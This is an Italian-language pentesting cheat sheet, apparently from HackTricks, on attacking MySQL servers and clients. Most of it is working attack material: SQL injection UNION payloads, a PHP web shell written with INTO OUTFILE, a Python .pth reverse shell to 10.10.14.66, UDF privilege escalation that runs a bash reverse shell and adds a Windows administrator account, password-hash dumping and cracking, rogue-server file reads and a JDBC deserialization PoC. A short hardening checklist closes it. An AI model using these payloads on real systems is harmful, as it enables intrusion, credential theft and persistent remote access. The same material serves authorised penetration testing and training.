3306 - Pentesting Mysql

Reading time: 17 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Informazioni di base

MySQL può essere descritto come un Sistema di Gestione di Database Relazionali (RDBMS) open source disponibile gratuitamente. Funziona con il Linguaggio di Query Strutturato (SQL), consentendo la gestione e la manipolazione dei database.

Porta predefinita: 3306

3306/tcp open  mysql

Connetti

Locale

bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remoto

bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Enumerazione Esterna

Alcune delle azioni di enumerazione richiedono credenziali valide

bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Scrivi qualsiasi dato binario

bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Comandi MySQL

bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Enumerazione dei permessi MySQL

sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Puoi vedere nella documentazione il significato di ciascun privilegio: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Esecuzione di codice remoto in Python .pth (hook di configurazione specifici del sito)

Abusando del classico INTO OUTFILE è possibile ottenere l'esecuzione di codice arbitrario su obiettivi che successivamente eseguono script Python.

  1. Usa INTO OUTFILE per creare un file .pth personalizzato all'interno di qualsiasi directory caricata automaticamente da site.py (ad es. .../lib/python3.10/site-packages/).
  2. Il file .pth può contenere una singola riga che inizia con import seguita da codice Python arbitrario che verrà eseguito ogni volta che l'interprete si avvia.
  3. Quando l'interprete viene eseguito implicitamente da uno script CGI (ad esempio /cgi-bin/ml-draw.py con shebang #!/bin/python), il payload viene eseguito con gli stessi privilegi del processo del server web (FortiWeb lo ha eseguito come root → RCE completa pre-autenticazione).

Esempio di payload .pth (singola riga, non possono essere inclusi spazi nel payload SQL finale, quindi potrebbe essere necessario l'uso di hex/UNHEX() o concatenazione di stringhe):

python
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Esempio di creazione del file tramite una query UNION (i caratteri di spazio sono sostituiti con /**/ per bypassare un filtro di spazio sscanf("%128s") e mantenere la lunghezza totale ≤128 byte):

sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Limitazioni importanti e bypass:

  • INTO OUTFILE non può sovrascrivere file esistenti; scegliere un nuovo nome file.
  • Il percorso del file è risolto rispetto alla CWD di MySQL, quindi anteporre ../../ aiuta ad accorciare il percorso e bypassare le restrizioni sui percorsi assoluti.
  • Se l'input dell'attaccante è estratto con %128s (o simile) qualsiasi spazio troncerebbe il payload; utilizzare le sequenze di commento di MySQL /**/ o /*!*/ per sostituire gli spazi.
  • L'utente MySQL che esegue la query ha bisogno del privilegio FILE, ma in molti dispositivi (ad es. FortiWeb) il servizio viene eseguito come root, dando accesso in scrittura quasi ovunque.

Dopo aver eliminato il .pth, basta richiedere qualsiasi CGI gestito dall'interprete python per ottenere l'esecuzione del codice:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Il processo Python importerĂ  automaticamente il .pth malevolo ed eseguirĂ  il payload della shell.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL lettura arbitraria di file da parte del client

In realtĂ , quando provi a caricare dati localmente in una tabella il contenuto di un file, il server MySQL o MariaDB chiede al client di leggerlo e inviare il contenuto. Quindi, se riesci a manomettere un client mysql per connetterti al tuo server MySQL, puoi leggere file arbitrari.
Si prega di notare che questo è il comportamento utilizzando:

bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Nota la parola "locale")
PerchĂŠ senza "locale" puoi ottenere:

bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

PoC iniziale: https://github.com/allyshka/Rogue-MySql-Server
In questo documento puoi vedere una descrizione completa dell'attacco e persino come estenderlo a RCE: https://paper.seebug.org/1113/
Qui puoi trovare una panoramica dell'attacco: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Utente Mysql

Sarà molto interessante se mysql è in esecuzione come root:

bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Impostazioni pericolose di mysqld.cnf

Nella configurazione dei servizi MySQL, vengono impiegate varie impostazioni per definire il suo funzionamento e le misure di sicurezza:

  • L'impostazione user è utilizzata per designare l'utente sotto il quale il servizio MySQL verrĂ  eseguito.
  • password è applicata per stabilire la password associata all'utente MySQL.
  • admin_address specifica l'indirizzo IP che ascolta le connessioni TCP/IP sull'interfaccia di rete amministrativa.
  • La variabile debug è indicativa delle attuali configurazioni di debug, inclusa l'informazione sensibile all'interno dei log.
  • sql_warnings gestisce se vengono generate stringhe informative per le istruzioni INSERT a riga singola quando emergono avvisi, contenendo dati sensibili all'interno dei log.
  • Con secure_file_priv, l'ambito delle operazioni di importazione ed esportazione dei dati è limitato per migliorare la sicurezza.

Escalation dei privilegi

bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Se il server mysql è in esecuzione come root (o un altro utente con privilegi superiori) puoi farlo eseguire comandi. Per questo, devi usare funzioni definite dall'utente. E per creare una funzione definita dall'utente avrai bisogno di una libreria per il sistema operativo che esegue mysql.

La libreria malevola da utilizzare può essere trovata all'interno di sqlmap e dentro metasploit eseguendo locate "*lib_mysqludf_sys*". I file .so sono librerie linux e i .dll sono quelli per Windows, scegli quello di cui hai bisogno.

Se non hai quelle librerie, puoi cercarle, oppure scaricare questo codice C per linux e compilarlo all'interno della macchina vulnerabile linux:

bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Ora che hai la libreria, accedi a Mysql come utente privilegiato (root?) e segui i passaggi successivi:

Linux

sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

sql
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Estrazione delle credenziali MySQL dai file

All'interno di /etc/mysql/debian.cnf puoi trovare la password in chiaro dell'utente debian-sys-maint

bash
cat /etc/mysql/debian.cnf

Puoi utilizzare queste credenziali per accedere al database mysql.

All'interno del file: /var/lib/mysql/mysql/user.MYD puoi trovare tutti gli hash degli utenti MySQL (quelli che puoi estrarre da mysql.user all'interno del database).

Puoi estrarli eseguendo:

bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Abilitare il logging

Puoi abilitare il logging delle query mysql all'interno di /etc/mysql/my.cnf decommentando le seguenti righe:

File utili

File di configurazione

  • windows *
  • config.ini
  • my.ini
  • windows\my.ini
  • winnt\my.ini
  • <InstDir>/mysql/data/
  • unix
  • my.cnf
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /var/lib/mysql/my.cnf
  • ~/.my.cnf
  • /etc/my.cnf
  • Cronologia comandi
  • ~/.mysql.history
  • File di log
  • connections.log
  • update.log
  • common.log

Database/Tabelle MySQL predefiniti

ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS

HackTricks Comandi Automatici

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023-2025 Highlights (new)

JDBC propertiesTransform deserialization (CVE-2023-21971)

A partire da Connector/J <= 8.0.32, un attaccante che può influenzare il JDBC URL (ad esempio in software di terze parti che richiede una stringa di connessione) può richiedere il caricamento di classi arbitrarie sul lato client tramite il parametro propertiesTransform. Se un gadget presente nel class-path è caricabile, questo porta a esecuzione di codice remoto nel contesto del client JDBC (pre-autenticazione, poichÊ non sono necessarie credenziali valide). Un PoC minimo appare cosÏ:

java
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Eseguire Evil.class può essere facile come posizionarlo nel class-path dell'applicazione vulnerabile o lasciare che un server MySQL malevolo invii un oggetto serializzato dannoso. Il problema è stato risolto in Connector/J 8.0.33 – aggiorna il driver o imposta esplicitamente propertiesTransform su una lista di autorizzazione. (Vedi il report di Snyk per i dettagli)

Attacchi di server MySQL falsi / malevoli contro i client JDBC

Diversi strumenti open-source implementano un protocollo MySQL parziale per attaccare i client JDBC che si connettono verso l'esterno:

  • mysql-fake-server (Java, supporta exploit di lettura file e deserializzazione)
  • rogue_mysql_server (Python, capacitĂ  simili)

Percorsi di attacco tipici:

  1. L'applicazione vittima carica mysql-connector-j con allowLoadLocalInfile=true o autoDeserialize=true.
  2. L'attaccante controlla DNS / voce host in modo che il nome host del DB si risolva in una macchina sotto il suo controllo.
  3. Il server malevolo risponde con pacchetti creati ad hoc che attivano la lettura di file arbitrari LOCAL INFILE o la deserializzazione Java → RCE.

Esempio di one-liner per avviare un server falso (Java):

bash
java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Poi punta l'applicazione vittima a jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true e leggi /etc/passwd codificando il nome del file in base64 nel campo username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 memorizza gli hash delle password come $mysql-sha2$ (SHA-256). Sia Hashcat (modalità 21100) che John-the-Ripper (--format=mysql-sha2) supportano il cracking offline dal 2023. Dumpa la colonna authentication_string e alimentala direttamente:

bash
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Hardening checklist (2025)

• Imposta LOCAL_INFILE=0 e --secure-file-priv=/var/empty per eliminare la maggior parte delle primitive di lettura/scrittura file.
• Rimuovi il privilegio FILE dagli account delle applicazioni.
• Su Connector/J imposta allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (vuoto).
• Disabilita i plugin di autenticazione non utilizzati e richiedi TLS (require_secure_transport = ON).
• Monitora per CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL e improvvisi comandi SET GLOBAL.

References

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks